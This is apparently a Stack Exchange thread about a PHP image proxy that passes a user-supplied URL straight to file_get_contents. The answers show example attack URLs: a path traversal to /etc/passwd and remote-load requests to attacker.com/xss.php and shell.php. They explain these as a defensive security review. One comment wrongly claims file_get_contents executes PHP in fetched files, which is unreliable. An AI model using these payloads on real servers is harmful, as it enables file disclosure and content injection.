# Get image from other site in PHP

Tags: php, image, network-file-transfer

I would like to get images from other websites.

This is my current method but I'm not sure if it is alright.

```
<?php
  header('Content-Type: '.image_type_to_mime_type(exif_imagetype($_GET['url'])));
  echo(file_get_contents($_GET['url']));
?>
```

If not, how should I do it?

Comment: What is this code supposed to do? Why don't you use the URL o the image directly?

Comment: Because of the Same-origin policy

Comment: To my knowledge, the Same-origin policy applies to Javascript, not to images.

Comment: Yep, but I you use JS for sourcing (I think I need to, the user gives the source), so (I guess) it need to be on the same origin.

Comment: Then maybe you should update the title of your question (it only mention images at this moment).

Answer (score 14):

Your code is vulnerable to LFI and XSS.

```
http://localhost/yourscript.php?url=../../../../../../etc/passwd
```

This would load the local file /etc/passwd and display it.

```
http://localhost/yourscript.php?url=http://attacker.com/xss.php
```

This would load and display the remote file xss.php, which would lead to XSS.

For better solutions, see eg [here](https://stackoverflow.com/questions/12629410/how-can-i-render-a-remote-image-with-php). When outputting images, you should use the image output functions such as `imagejpeg`, not generic file loading functions.

Comment: What is LFI and RFI? I can't find it... Then is it alright to only allow absolute URLs?

Comment: +and checking the mime type

Comment: Local File Injection and Remote File Injection. It basically means that anyone can "inject" (load) remote or local files (files from *your* server) into your script.

Comment: @HalasiTomi local file inclusion and remote file inclusion. My first example is an example of LFI, my second one of RFI. And no, only allowing absolute URLs will not help against RFI (if done correctly, it may help against LFI).

Comment: @HalasiTomi [Mime type checking is difficult](https://security.stackexchange.com/questions/115317). I would not use it as your only line of defense.

Comment: The linked answers give ways to do the trick with jpeg. Is it possible with all (popular) image types (like PNG or GIF)?

Comment: @HalasiTomi I don't think so, you would need to do that yourself with the various image output functions (`imagegif`, `imagepng`, etc). Personally, I would just link the image directly, as I don't see the need to send images stored on any server from my server. Even if done correctly, you should consider the image damage. If users visit your domain, they will expect that you are responsible for the content (consider eg `http://you.com/script.php?somelongqueryargs&url=http://evil.com/smut.png&morequeryargs`). But it really depends on your exact use case.

Comment: In my case, the user gives the input URL, so it shouldn't be a big confusion. But if there is a better way to do job, I'll happily use that :)

Comment: Which part of the code causes remote code execution? I can see maybe that there might be a problem with XSS but I don't see how this causes PHP code to be executed.

Comment: @arxanas the RFI. `file_get_contents` will execute any PHP code it may find in a given file. So if `url` is `http://attacker.com/shell.php`, anything in that PHP file will be executed on the server.  The same is true for other file reading functions such as `readfile`. The PHP documentation doesn't really mention it, but you can try it yourself (It may depend on some php.ini settings, but I tried on multiple setups, and it always worked).

Comment: @arxanas I'm now a bit unsure about this myself, so I created a [question on security.SE](https://security.stackexchange.com/questions/119825/) about this. It always worked for me, but it might depend on some specific settings.